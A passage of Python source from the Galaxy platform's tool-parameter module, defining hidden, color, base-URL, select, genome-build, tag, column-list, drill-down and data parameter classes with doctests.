_name
>>> assert sorted(p.to_dict(trans).items()) == [('argument', None), ('help', ''), ('hidden', True), ('is_dynamic', False), ('label', ''), ('model_class', 'HiddenToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'hidden'), ('value', u'_value')]
"""
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
self.value = input_source.get('value')
self.hidden = True
def get_initial_value(self, trans, other_values):
return self.value
def get_label(self):
return None
class ColorToolParameter(ToolParameter):
"""
Parameter that stores a color.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = ColorToolParameter(None, XML('<param name="_name" type="color" value="#ffffff"/>'))
>>> print(p.name)
_name
>>> print(p.to_param_dict_string("#ffffff"))
#ffffff
>>> assert sorted(p.to_dict(trans).items()) == [('argument', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'ColorToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'color'), ('value', u'#ffffff')]
>>> p = ColorToolParameter(None, XML('<param name="_name" type="color"/>'))
>>> print(p.get_initial_value(trans, {}))
#000000
>>> p = ColorToolParameter(None, XML('<param name="_name" type="color" value="#ffffff" rgb="True"/>'))
>>> print(p.to_param_dict_string("#ffffff"))
(255, 255, 255)
>>> with assert_throws_param_value_error("parameter '_name': Failed to convert 'None' to RGB."):
... p.to_param_dict_string(None)
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.value = input_source.get('value', '#000000')
self.rgb = input_source.get('rgb', False)
def get_initial_value(self, trans, other_values):
if self.value is not None:
return self.value.lower()
def to_param_dict_string(self, value, other_values=None):
if self.rgb:
try:
return str(tuple(int(value.lstrip('#')[i: i + 2], 16) for i in (0, 2, 4)))
except Exception:
raise ParameterValueError(f"Failed to convert '{value}' to RGB.", self.name)
return str(value)
class BaseURLToolParameter(HiddenToolParameter):
"""
Returns a parameter that contains its value prepended by the
current server base url. Used in all redirects.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = BaseURLToolParameter(None, XML('<param name="_name" type="base_url" value="_value"/>'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('argument', None), ('help', ''), ('hidden', True), ('is_dynamic', False), ('label', ''), ('model_class', 'BaseURLToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'base_url'), ('value', u'_value')]
"""
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
self.value = input_source.get('value', '')
def get_initial_value(self, trans, other_values):
return self._get_value(trans)
def from_json(self, value=None, trans=None, other_values=None):
return self._get_value(trans)
def _get_value(self, trans):
try:
if not self.value.startswith("/"):
raise Exception("baseurl value must start with a /")
return trans.qualified_url_builder(self.value)
except Exception as e:
log.debug('Url creation failed for "%s": %s', self.name, unicodify(e))
return self.value
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
return d
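# Illustrative note (not in the original source): for a BaseURLToolParameter
# whose value is "/static/welcome.html", _get_value() hands that path to
# trans.qualified_url_builder() and returns a fully qualified URL such as
# "https://<galaxy-host>/static/welcome.html"; if the value does not start with
# "/" or URL building fails, the raw value is returned unchanged.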
class SelectToolParameter(ToolParameter):
"""
Parameter that takes on one (or many) of a specific set of values.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(), workflow_building_mode=False)
>>> p = SelectToolParameter(None, XML(
... '''
... <param name="_name" type="select">
... <option value="x">x_label</option>
... <option value="y" selected="true">y_label</option>
... <option value="z">z_label</option>
... </param>
... '''))
>>> print(p.name)
_name
>>> sorted(p.to_dict(trans).items())
[('argument', None), ('display', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'SelectToolParameter'), ('multiple', False), ('name', '_name'), ('optional', False), ('options', [('x_label', 'x', False), ('y_label', 'y', True), ('z_label', 'z', False)]), ('refresh_on_change', False), ('textable', False), ('type', 'select'), ('value', 'y')]
>>> p = SelectToolParameter(None, XML(
... '''
... <param name="_name" type="select" multiple="true">
... <option value="x">x_label</option>
... <option value="y" selected="true">y_label</option>
... <option value="z" selected="true">z_label</option>
... </param>
... '''))
>>> print(p.name)
_name
>>> sorted(p.to_dict(trans).items())
[('argument', None), ('display', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'SelectToolParameter'), ('multiple', True), ('name', '_name'), ('optional', True), ('options', [('x_label', 'x', False), ('y_label', 'y', True), ('z_label', 'z', True)]), ('refresh_on_change', False), ('textable', False), ('type', 'select'), ('value', ['y', 'z'])]
>>> print(p.to_param_dict_string(["y", "z"]))
y,z
"""
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.multiple = input_source.get_bool('multiple', False)
# Multiple selects are optional by default, single selection is the inverse.
self.optional = input_source.parse_optional(self.multiple)
self.display = input_source.get('display', None)
self.separator = input_source.get('separator', ',')
self.legal_values = set()
self.dynamic_options = input_source.get('dynamic_options', None)
self.options = parse_dynamic_options(self, input_source)
if self.options is not None:
for validator in self.options.validators:
self.validators.append(validator)
if self.dynamic_options is None and self.options is None:
self.static_options = input_source.parse_static_options()
for (_, value, _) in self.static_options:
self.legal_values.add(value)
self.is_dynamic = ((self.dynamic_options is not None) or (self.options is not None))
def _get_dynamic_options_call_other_values(self, trans, other_values):
call_other_values = ExpressionContext({'__trans__': trans})
if other_values:
call_other_values.parent = other_values.parent
call_other_values.update(other_values.dict)
return call_other_values
def get_options(self, trans, other_values):
if self.options:
return self.options.get_options(trans, other_values)
elif self.dynamic_options:
call_other_values = self._get_dynamic_options_call_other_values(trans, other_values)
try:
return eval(self.dynamic_options, self.tool.code_namespace, call_other_values)
except Exception as e:
log.debug("Error determining dynamic options for parameter '%s' in tool '%s':", self.name, self.tool.id, exc_info=e)
return []
else:
return self.static_options
def get_legal_values(self, trans, other_values, value):
"""
determine the set of values of legal options
"""
return {v for _, v, _ in self.get_options(trans, other_values)}
def get_legal_names(self, trans, other_values):
"""
determine a mapping from names to values for all legal options
"""
return {n: v for n, v, _ in self.get_options(trans, other_values)}
def from_json(self, value, trans, other_values=None, require_legal_value=True):
other_values = other_values or {}
try:
legal_values = self.get_legal_values(trans, other_values, value)
except ImplicitConversionRequired:
return value
# if the given value is not found in the set of values of the legal
# options we fall back to check if the value is in the set of names of
# the legal options. this is done with the fallback_values dict which
# allows to determine the corresponding legal values
fallback_values = self.get_legal_names(trans, other_values)
if (not legal_values or not require_legal_value) and is_runtime_context(trans, other_values):
if self.multiple:
# While it is generally allowed that a select value can be '',
# we do not allow this to be the case in a dynamically
# generated multiple select list being set in workflow building
# mode; we instead treat '' as 'No option Selected' (None)
if value == '':
value = None
else:
if isinstance(value, str):
# Split on all whitespace. This not only provides flexibility
# in interpreting values but also is needed because many browsers
# use \r\n to separate lines.
value = value.split()
return value
elif value is None:
if self.optional:
return None
raise ParameterValueError("an invalid option (None) was selected, please verify", self.name, None, is_dynamic=self.is_dynamic)
elif not legal_values:
if self.optional and self.tool.profile < 18.09:
# Covers optional parameters with default values that reference other optional parameters.
# These will have a value but no legal_values.
# See https://github.com/galaxyproject/tools-iuc/pull/1842#issuecomment-394083768 for context.
return None
raise ParameterValueError("requires a value, but no legal values defined", self.name, is_dynamic=self.is_dynamic)
if isinstance(value, list):
if not self.multiple:
raise ParameterValueError("multiple values provided but parameter is not expecting multiple values", self.name, is_dynamic=self.is_dynamic)
if set(value).issubset(legal_values):
return value
elif set(value).issubset(set(fallback_values.keys())):
return [fallback_values[v] for v in value]
else:
raise ParameterValueError(f"invalid options ({','.join(set(value) - set(legal_values))!r}) were selected (valid options: {','.join(legal_values)})", self.name, is_dynamic=self.is_dynamic)
else:
value_is_none = (value == "None" and "None" not in legal_values)
if value_is_none or not value:
if self.multiple:
if self.optional:
return []
else:
raise ParameterValueError("no option was selected for non optional parameter", self.name, is_dynamic=self.is_dynamic)
if is_runtime_value(value):
return None
if value in legal_values:
return value
elif value in fallback_values:
return fallback_values[value]
elif not require_legal_value:
return value
else:
raise ParameterValueError(f"an invalid option ({value!r}) was selected (valid options: {','.join(legal_values)})", self.name, value, is_dynamic=self.is_dynamic)
def to_param_dict_string(self, value, other_values=None):
if value in (None, []):
return "None"
if isinstance(value, list):
if not self.multiple:
raise ParameterValueError("multiple values provided but parameter is not expecting multiple values", self.name, is_dynamic=self.is_dynamic)
value = list(map(str, value))
else:
value = str(value)
if self.tool is None or self.tool.options.sanitize:
if self.sanitizer:
value = self.sanitizer.sanitize_param(value)
else:
value = sanitize_param(value)
if isinstance(value, list):
value = self.separator.join(value)
return value
def to_json(self, value, app, use_security):
return value
def get_initial_value(self, trans, other_values):
try:
options = list(self.get_options(trans, other_values))
except ImplicitConversionRequired:
return None
if not options:
return None
value = [optval for _, optval, selected in options if selected]
if len(value) == 0:
if not self.optional and not self.multiple and options:
# Nothing selected, but not optional and not a multiple select, with some values,
# so we have to default to something (the HTML form will anyway)
value = options[0][1]
else:
value = None
elif len(value) == 1 or not self.multiple:
value = value[0]
return value
def to_text(self, value):
if not isinstance(value, list):
value = [value]
# FIXME: Currently only translating values back to labels if they
# are not dynamic
if self.is_dynamic:
rval = [str(_) for _ in value]
else:
options = list(self.static_options)
rval = []
for t, v, _ in options:
if v in value:
rval.append(t)
if rval:
return "\n".join(rval)
return "Nothing selected."
def get_dependencies(self):
"""
Get the *names* of the other params this param depends on.
"""
if self.options:
return self.options.get_dependency_names()
else:
return []
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
d = super().to_dict(trans, other_values)
# Get options, value.
options = self.get_options(trans, other_values)
d['options'] = options
d['display'] = self.display
d['multiple'] = self.multiple
d['textable'] = is_runtime_context(trans, other_values)
return d
class GenomeBuildParameter(SelectToolParameter):
"""
Select list that sets the last used genome build for the current history as "selected".
>>> # Create a mock transaction with 'hg17' as the current build
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(genome_build='hg17'), db_builds=dbkeys.read_dbnames(None))
>>> p = GenomeBuildParameter(None, XML('<param name="_name" type="genomebuild" value="hg17" />'))
>>> print(p.name)
_name
>>> d = p.to_dict(trans)
>>> o = d['options']
>>> [i for i in o if i[2] == True]
[('Human May 2004 (NCBI35/hg17) (hg17)', 'hg17', True)]
>>> [i for i in o if i[1] == 'hg18']
[('Human Mar. 2006 (NCBI36/hg18) (hg18)', 'hg18', False)]
>>> p.is_dynamic
True
"""
def __init__(self, *args, **kwds):
super().__init__(*args, **kwds)
if self.tool:
self.static_options = [(value, key, False) for key, value in self._get_dbkey_names()]
self.is_dynamic = True
def get_options(self, trans, other_values):
last_used_build = object()
if trans.history:
last_used_build = trans.history.genome_build
for dbkey, build_name in self._get_dbkey_names(trans=trans):
yield build_name, dbkey, (dbkey == last_used_build)
def get_legal_values(self, trans, other_values, value):
return {dbkey for dbkey, _ in self._get_dbkey_names(trans=trans)}
def to_dict(self, trans, other_values=None):
# skip SelectToolParameter (the immediate parent) because we need to get options in a different way here
d = ToolParameter.to_dict(self, trans)
# Get options, value - options is a generator here, so compile to list
options = list(self.get_options(trans, {}))
value = options[0][1]
for option in options:
if option[2]:
# Found selected option.
value = option[1]
d.update({
'options': options,
'value': value,
'display': self.display,
'multiple': self.multiple,
})
return d
def _get_dbkey_names(self, trans=None):
if not self.tool:
# Hack for unit tests, since we have no tool
return dbkeys.read_dbnames(None)
return self.tool.app.genome_builds.get_genome_build_names(trans=trans)
class SelectTagParameter(SelectToolParameter):
"""
Select set that is composed of a set of tags available for an input.
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.tool = tool
self.tag_key = input_source.get("group", False)
self.optional = input_source.get("optional", False)
self.multiple = input_source.get("multiple", False)
self.accept_default = input_source.get_bool("accept_default", False)
if self.accept_default:
self.optional = True
self.data_ref = input_source.get("data_ref", None)
self.ref_input = None
# Legacy style default value specification...
self.default_value = input_source.get("default_value", None)
if self.default_value is None:
# Newer style... more in line with other parameters.
self.default_value = input_source.get("value", None)
self.is_dynamic = True
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
if self.multiple:
tag_list = []
# split on newline and ,
if isinstance(value, list) or isinstance(value, str):
if not isinstance(value, list):
value = value.split('\n')
for tag_str in value:
for tag in str(tag_str).split(','):
tag = tag.strip()
if tag:
tag_list.append(tag)
value = tag_list
else:
if not value:
value = None
# We skip requiring legal values -- this is similar to optional, but allows only a subset of datasets to be positive
# TODO: May not actually be required for (nested) collection input ?
return super().from_json(value, trans, other_values, require_legal_value=False)
def get_tag_list(self, other_values):
"""
Generate a select list containing the tags of the associated dataset (if found).
"""
# Get the value of the associated data reference (a dataset)
history_items = other_values.get(self.data_ref, None)
# Check if a dataset is selected
if is_runtime_value(history_items):
return []
if not history_items:
return []
tags = set()
for history_item in util.listify(history_items):
if hasattr(history_item, 'dataset_instances'):
for dataset in history_item.dataset_instances:
for tag in dataset.tags:
if tag.user_tname == 'group':
tags.add(tag.user_value)
else:
for tag in history_item.tags:
if tag.user_tname == 'group':
tags.add(tag.user_value)
return list(tags)
def get_options(self, trans, other_values):
"""
Show tags
"""
options = []
for tag in self.get_tag_list(other_values):
options.append((f"Tags: {tag}", tag, False))
return options
def get_initial_value(self, trans, other_values):
if self.default_value is not None:
return self.default_value
return SelectToolParameter.get_initial_value(self, trans, other_values)
def get_legal_values(self, trans, other_values, value):
if self.data_ref not in other_values and not trans.workflow_building_mode:
raise ValueError("Value for associated data reference not found (data_ref).")
return set(self.get_tag_list(other_values))
def get_dependencies(self):
return [self.data_ref]
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
d = super().to_dict(trans, other_values=other_values)
d['data_ref'] = self.data_ref
return d
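# Illustrative note (not in the original source): get_tag_list() above only
# collects tags in the "group" namespace, so a dataset tagged e.g.
# "group:control" contributes the option ("Tags: control", "control", False)
# to get_options(), while tags in other namespaces are ignored.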
class ColumnListParameter(SelectToolParameter):
"""
Select list that consists of either the total number of columns or only
those columns that contain numerical values in the associated DataToolParameter.
# TODO: we need better testing here, but not sure how to associate a DataToolParameter with a ColumnListParameter
# from a twill perspective...
>>> # Mock up a history (not connected to database)
>>> from galaxy.model import History, HistoryDatasetAssociation
>>> from galaxy.util.bunch import Bunch
>>> from galaxy.model.mapping import init
>>> sa_session = init("/tmp", "sqlite:///:memory:", create_tables=True).session
>>> hist = History()
>>> sa_session.add(hist)
>>> sa_session.flush()
>>> hda = hist.add_dataset(HistoryDatasetAssociation(id=1, extension='interval', create_dataset=True, sa_session=sa_session))
>>> dtp = DataToolParameter(None, XML('<param name="blah" type="data" format="interval"/>'))
>>> print(dtp.name)
blah
>>> clp = ColumnListParameter(None, XML('<param name="numerical_column" type="data_column" data_ref="blah" numerical="true"/>'))
>>> print(clp.name)
numerical_column
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.numerical = input_source.get_bool("numerical", False)
self.optional = input_source.parse_optional(False)
self.accept_default = input_source.get_bool("accept_default", False)
if self.accept_default:
self.optional = True
self.data_ref = input_source.get("data_ref", None)
self.ref_input = None
# Legacy style default value specification...
self.default_value = input_source.get("default_value", None)
if self.default_value is None:
# Newer style... more in line with other parameters.
self.default_value = input_source.get("value", None)
if self.default_value is not None:
self.default_value = ColumnListParameter._strip_c(self.default_value)
self.is_dynamic = True
self.usecolnames = input_source.get_bool("use_header_names", False)
def from_json(self, value, trans, other_values=None):
"""
Label convention prepends column number with a 'c', but tool uses the integer. This
removes the 'c' when entered into a workflow.
"""
other_values = other_values or {}
if self.multiple:
# split on newline and ,
if isinstance(value, list) or isinstance(value, str):
column_list = []
if not isinstance(value, list):
value = value.split('\n')
for column in value:
for column2 in str(column).split(','):
column2 = column2.strip()
if column2:
column_list.append(column2)
value = list(map(ColumnListParameter._strip_c, column_list))
else:
value = []
else:
if value:
value = ColumnListParameter._strip_c(value)
else:
value = None
if not value and self.accept_default:
value = self.default_value or '1'
return [value] if self.multiple else value
return super().from_json(value, trans, other_values)
@staticmethod
def _strip_c(column):
if isinstance(column, str):
if column.startswith('c') and len(column) > 1 and all(c.isdigit() for c in column[1:]):
column = column.strip().lower()[1:]
return column
def get_column_list(self, trans, other_values):
"""
Generate a select list containing the columns of the associated
dataset (if found).
"""
# Get the value of the associated data reference (a dataset)
dataset = other_values.get(self.data_ref)
# Check if a dataset is selected
if not dataset:
return []
column_list = None
for dataset in util.listify(dataset):
# Use representative dataset if a dataset collection is parsed
if isinstance(dataset, trans.app.model.HistoryDatasetCollectionAssociation):
dataset = dataset.to_hda_representative()
if isinstance(dataset, trans.app.model.HistoryDatasetAssociation) and self.ref_input and self.ref_input.formats:
direct_match, target_ext, converted_dataset = dataset.find_conversion_destination(self.ref_input.formats)
if not direct_match and target_ext:
if not converted_dataset:
raise ImplicitConversionRequired
else:
dataset = converted_dataset
# Columns can only be identified if the dataset is ready and metadata is available
if not hasattr(dataset, 'metadata') or \
not hasattr(dataset.metadata, 'columns') or \
not dataset.metadata.columns:
return []
# Build up possible columns for this dataset
this_column_list = []
if self.numerical:
# If numerical was requested, filter columns based on metadata
for i, col in enumerate(dataset.metadata.column_types):
if col == 'int' or col == 'float':
this_column_list.append(str(i + 1))
else:
this_column_list = [str(i) for i in range(1, dataset.metadata.columns + 1)]
# Take the intersection of these columns with the other columns.
if column_list is None:
column_list = this_column_list
else:
column_list = [c for c in column_list if c in this_column_list]
return column_list
def get_options(self, trans, other_values):
"""
Show column labels rather than c1..cn if use_header_names=True
"""
options = []
if self.usecolnames: # read first row - assume is a header with metadata useful for making good choices
dataset = other_values.get(self.data_ref, None)
try:
with open(dataset.get_file_name()) as f:
head = f.readline()
cnames = head.rstrip("\n\r ").split('\t')
column_list = [('%d' % (i + 1), 'c%d: %s' % (i + 1, x)) for i, x in enumerate(cnames)]
if self.numerical: # If numerical was requested, filter columns based on metadata
if hasattr(dataset, 'metadata') and hasattr(dataset.metadata, 'column_types'):
if len(dataset.metadata.column_types) >= len(cnames):
numerics = [i for i, x in enumerate(dataset.metadata.column_types) if x in ['int', 'float']]
column_list = [column_list[i] for i in numerics]
except Exception:
column_list = self.get_column_list(trans, other_values)
else:
column_list = self.get_column_list(trans, other_values)
for col in column_list:
if isinstance(col, tuple) and len(col) == 2:
options.append((col[1], col[0], False))
else:
options.append((f"Column: {col}", col, False))
return options
def get_initial_value(self, trans, other_values):
if self.default_value is not None:
return self.default_value
return super().get_initial_value(trans, other_values)
def get_legal_values(self, trans, other_values, value):
if self.data_ref not in other_values:
raise ValueError("Value for associated data reference not found (data_ref).")
legal_values = self.get_column_list(trans, other_values)
if value is not None:
# There are cases where 'value' is a string of comma separated values. This ensures
# that it is converted into a list, with extra whitespace around items removed.
value = util.listify(value, do_strip=True)
if not set(value).issubset(set(legal_values)) and self.is_file_empty(trans, other_values):
legal_values.extend(value)
return set(legal_values)
def is_file_empty(self, trans, other_values):
for dataset in util.listify(other_values.get(self.data_ref)):
# Use representative dataset if a dataset collection is parsed
if isinstance(dataset, trans.app.model.HistoryDatasetCollectionAssociation):
dataset = dataset.to_hda_representative()
if is_runtime_value(dataset) or not dataset.has_data():
return True
return False
def get_dependencies(self):
return [self.data_ref]
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
d = super().to_dict(trans, other_values=other_values)
d['data_ref'] = self.data_ref
d['numerical'] = self.numerical
return d
class DrillDownSelectToolParameter(SelectToolParameter):
"""
Parameter that takes on one (or many) of a specific set of values.
Creating a hierarchical select menu, which allows users to 'drill down' a tree-like set of options.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(genome_build='hg17'), db_builds=dbkeys.read_dbnames(None))
>>> p = DrillDownSelectToolParameter(None, XML(
... '''
... <param name="_name" type="drill_down" display="checkbox" hierarchy="recurse" multiple="true">
... <options>
... <option name="Heading 1" value="heading1">
... <option name="Option 1" value="option1"/>
... <option name="Option 2" value="option2"/>
... <option name="Heading 2" value="heading2">
... <option name="Option 3" value="option3"/>
... <option name="Option 4" value="option4"/>
... </option>
... </option>
... <option name="Option 5" value="option5"/>
... </options>
... </param>
... '''))
>>> print(p.name)
_name
>>> d = p.to_dict(trans)
>>> assert d['multiple'] == True
>>> assert d['display'] == 'checkbox'
>>> assert d['options'][0]['name'] == 'Heading 1'
>>> assert d['options'][0]['value'] == 'heading1'
>>> assert d['options'][0]['options'][0]['name'] == 'Option 1'
>>> assert d['options'][0]['options'][0]['value'] == 'option1'
>>> assert d['options'][0]['options'][1]['name'] == 'Option 2'
>>> assert d['options'][0]['options'][1]['value'] == 'option2'
>>> assert d['options'][0]['options'][2]['name'] == 'Heading 2'
>>> assert d['options'][0]['options'][2]['value'] == 'heading2'
>>> assert d['options'][0]['options'][2]['options'][0]['name'] == 'Option 3'
>>> assert d['options'][0]['options'][2]['options'][0]['value'] == 'option3'
>>> assert d['options'][0]['options'][2]['options'][1]['name'] == 'Option 4'
>>> assert d['options'][0]['options'][2]['options'][1]['value'] == 'option4'
>>> assert d['options'][1]['name'] == 'Option 5'
>>> assert d['options'][1]['value'] == 'option5'
"""
def __init__(self, tool, input_source, context=None):
def recurse_option_elems(cur_options, option_elems):
for option_elem in option_elems:
selected = string_as_bool(option_elem.get('selected', False))
cur_options.append({'name': option_elem.get('name'), 'value': option_elem.get('value'), 'options': [], 'selected': selected})
recurse_option_elems(cur_options[-1]['options'], option_elem.findall('option'))
input_source = ensure_input_source(input_source)
ToolParameter.__init__(self, tool, input_source)
# TODO: abstract XML out of here - so non-XML InputSources can
# specify DrillDown parameters.
elem = input_source.elem()
self.multiple = string_as_bool(elem.get('multiple', False))
self.display = elem.get('display', None)
self.hierarchy = elem.get('hierarchy', 'exact') # exact or recurse
self.separator = elem.get('separator', ',')
from_file = elem.get('from_file', None)
if from_file:
if not os.path.isabs(from_file):
from_file = os.path.join(tool.app.config.tool_data_path, from_file)
elem = XML(f"<root>{open(from_file).read()}</root>")
self.dynamic_options = elem.get('dynamic_options', None)
if self.dynamic_options:
self.is_dynamic = True
self.options = []
self.filtered = {}
if elem.find('filter'):
self.is_dynamic = True
for filter in elem.findall('filter'):
# currently only filtering by metadata key matching input file is allowed
if filter.get('type') == 'data_meta':
if filter.get('data_ref') not in self.filtered:
self.filtered[filter.get('data_ref')] = {}
if filter.get('meta_key') not in self.filtered[filter.get('data_ref')]:
self.filtered[filter.get('data_ref')][filter.get('meta_key')] = {}
if filter.get('value') not in self.filtered[filter.get('data_ref')][filter.get('meta_key')]:
self.filtered[filter.get('data_ref')][filter.get('meta_key')][filter.get('value')] = []
recurse_option_elems(self.filtered[filter.get('data_ref')][filter.get('meta_key')][filter.get('value')], filter.find('options').findall('option'))
elif not self.dynamic_options:
recurse_option_elems(self.options, elem.find('options').findall('option'))
def _get_options_from_code(self, trans=None, value=None, other_values=None):
        assert self.dynamic_options, Exception("dynamic_options was not specified")
call_other_values = ExpressionContext({'__trans__': trans, '__value__': value})
if other_values:
call_other_values.parent = other_values.parent
call_other_values.update(other_values.dict)
try:
return eval(self.dynamic_options, self.tool.code_namespace, call_other_values)
except Exception:
return []
def get_options(self, trans=None, value=None, other_values=None):
other_values = other_values or {}
if self.is_dynamic:
if self.dynamic_options:
options = self._get_options_from_code(trans=trans, value=value, other_values=other_values)
else:
options = []
for filter_key, filter_value in self.filtered.items():
dataset = other_values.get(filter_key)
if dataset.__class__.__name__.endswith("DatasetFilenameWrapper"): # this is a bad way to check for this, but problems importing class (due to circular imports?)
dataset = dataset.dataset
if dataset:
for meta_key, meta_dict in filter_value.items():
if hasattr(dataset, 'metadata') and hasattr(dataset.metadata, 'spec'):
check_meta_val = dataset.metadata.spec[meta_key].param.to_string(dataset.metadata.get(meta_key))
if check_meta_val in meta_dict:
options.extend(meta_dict[check_meta_val])
return options
return self.options
def get_legal_values(self, trans, other_values, value):
def recurse_options(legal_values, options):
for option in options:
legal_values.append(option['value'])
recurse_options(legal_values, option['options'])
legal_values = []
recurse_options(legal_values, self.get_options(trans=trans, other_values=other_values))
return legal_values
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
legal_values = self.get_legal_values(trans, other_values, value)
if not legal_values and trans.workflow_building_mode:
if self.multiple:
if value == '': # No option selected
value = None
else:
value = value.split("\n")
return value
elif value is None:
if self.optional:
return None
raise ParameterValueError(f"an invalid option ({value!r}) was selected", self.name, value)
elif not legal_values:
raise ParameterValueError("requires a value, but no legal values defined", self.name)
if not isinstance(value, list):
value = [value]
if len(value) > 1 and not self.multiple:
raise ParameterValueError("multiple values provided but parameter is not expecting multiple values", self.name)
rval = []
for val in value:
if val not in legal_values:
raise ParameterValueError(f"an invalid option ({val!r}) was selected (valid options: {','.join(legal_values)})", self.name, val)
rval.append(val)
return rval
def to_param_dict_string(self, value, other_values=None):
other_values = other_values or {}
def get_options_list(value):
def get_base_option(value, options):
for option in options:
if value == option['value']:
return option
rval = get_base_option(value, option['options'])
if rval:
return rval
return None # not found
def recurse_option(option_list, option):
if not option['options']:
option_list.append(option['value'])
else:
for opt in option['options']:
recurse_option(option_list, opt)
rval = []
recurse_option(rval, get_base_option(value, self.get_options(other_values=other_values)))
return rval or [value]
if value is None:
return "None"
rval = []
if self.hierarchy == "exact":
rval = value
else:
for val in value:
options = get_options_list(val)
rval.extend(options)
if len(rval) > 1 and not self.multiple:
raise ParameterValueError("multiple values provided but parameter is not expecting multiple values", self.name)
rval = self.separator.join(rval)
if self.tool is None or self.tool.options.sanitize:
if self.sanitizer:
rval = self.sanitizer.sanitize_param(rval)
else:
rval = sanitize_param(rval)
return rval
def get_initial_value(self, trans, other_values):
def recurse_options(initial_values, options):
for option in options:
if option['selected']:
initial_values.append(option['value'])
recurse_options(initial_values, option['options'])
# More working around dynamic options for workflow
options = self.get_options(trans=trans, other_values=other_values)
if not options:
return None
initial_values = []
recurse_options(initial_values, options)
if len(initial_values) == 0:
initial_values = None
return initial_values
def to_text(self, value):
def get_option_display(value, options):
for option in options:
if value == option['value']:
return option['name']
rval = get_option_display(value, option['options'])
if rval:
return rval
return None # not found
if not value:
value = []
elif not isinstance(value, list):
value = [value]
# FIXME: Currently only translating values back to labels if they
# are not dynamic
if self.is_dynamic:
if value:
if isinstance(value, list):
rval = value
else:
rval = [value]
else:
rval = []
else:
rval = []
for val in value:
rval.append(get_option_display(val, self.options) or val)
if rval:
return "\n".join(map(str, rval))
return "Nothing selected."
def get_dependencies(self):
"""
Get the *names* of the other params this param depends on.
"""
return list(self.filtered.keys())
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
# skip SelectToolParameter (the immediate parent) bc we need to get options in a different way here
d = ToolParameter.to_dict(self, trans)
d['options'] = self.get_options(trans=trans, other_values=other_values)
d['display'] = self.display
d['multiple'] = self.multiple
return d
class BaseDataToolParameter(ToolParameter):
def __init__(self, tool, input_source, trans):
super().__init__(tool, input_source)
self.min = input_source.get('min')
self.max = input_source.get('max')
if self.min:
try:
self.min = int(self.min)
except ValueError:
raise ParameterValueError("attribute 'min' must be an integer", self.name)
if self.max:
try:
self.max = int(self.max)
except ValueError:
raise ParameterValueError("attribute 'max' must be an integer", self.name)
self.refresh_on_change = True
# Find datatypes_registry
if self.tool is None:
if trans:
# Must account for "Input Dataset" types, which while not a tool still need access to the real registry.
# A handle to the transaction (and thus app) will be given by the module.
self.datatypes_registry = trans.app.datatypes_registry
else:
# This occurs for things such as unit tests
import galaxy.datatypes.registry
self.datatypes_registry = galaxy.datatypes.registry.Registry()
self.datatypes_registry.load_datatypes()
else:
self.datatypes_registry = self.tool.app.datatypes_registry # can be None if self.tool.app is a ValidationContext
def _parse_formats(self, trans, input_source):
"""
Build list of classes for supported data formats
"""
self.extensions = input_source.get('format', 'data').split(",")
formats = []
if self.datatypes_registry: # This may be None when self.tool.app is a ValidationContext
normalized_extensions = [extension.strip().lower() for extension in self.extensions]
for extension in normalized_extensions:
datatype = self.datatypes_registry.get_datatype_by_extension(extension)
if datatype is not None:
formats.append(datatype)
else:
log.warning(f"Datatype class not found for extension '{extension}', which is used in the 'format' attribute of parameter '{self.name}'")
self.formats = formats
def _parse_options(self, input_source):
# TODO: Enhance dynamic options for DataToolParameters. Currently,
# only the special case key='build' of type='data_meta' is
# a valid filter
self.options_filter_attribute = None
self.options = parse_dynamic_options(self, input_source)
if self.options:
# TODO: Abstract away XML handling here.
options_elem = input_source.elem().find('options')
self.options_filter_attribute = options_elem.get('options_filter_attribute', None)
self.is_dynamic = self.options is not None
def get_initial_value(self, trans, other_values):
if trans.workflow_building_mode is workflow_building_modes.ENABLED or trans.app.name == 'tool_shed':
return RuntimeValue()
if self.optional:
return None
history = trans.history
if history is not None:
dataset_matcher_factory = get_dataset_matcher_factory(trans)
dataset_matcher = dataset_matcher_factory.dataset_matcher(self, other_values)
if isinstance(self, DataToolParameter):
for hda in reversed(history.active_visible_datasets_and_roles):
match = dataset_matcher.hda_match(hda)
if match:
return match.hda
else:
dataset_collection_matcher = dataset_matcher_factory.dataset_collection_matcher(dataset_matcher)
for hdca in reversed(history.active_visible_dataset_collections):
if dataset_collection_matcher.hdca_match(hdca):
return hdca
def to_json(self, value, app, use_security):
def single_to_json(value):
src = None
if isinstance(value, dict) and 'src' in value and 'id' in value:
return value
elif isinstance(value, galaxy.model.DatasetCollectionElement):
src = 'dce'
elif isinstance(value, app.model.HistoryDatasetCollectionAssociation):
src = 'hdca'
elif isinstance(value, app.model.LibraryDatasetDatasetAssociation):
src = 'ldda'
elif isinstance(value, app.model.HistoryDatasetAssociation) or hasattr(value, 'id'):
# hasattr 'id' fires a query on persistent objects after a flush so better
# to do the isinstance check. Not sure we need the hasattr check anymore - it'd be
# nice to drop it.
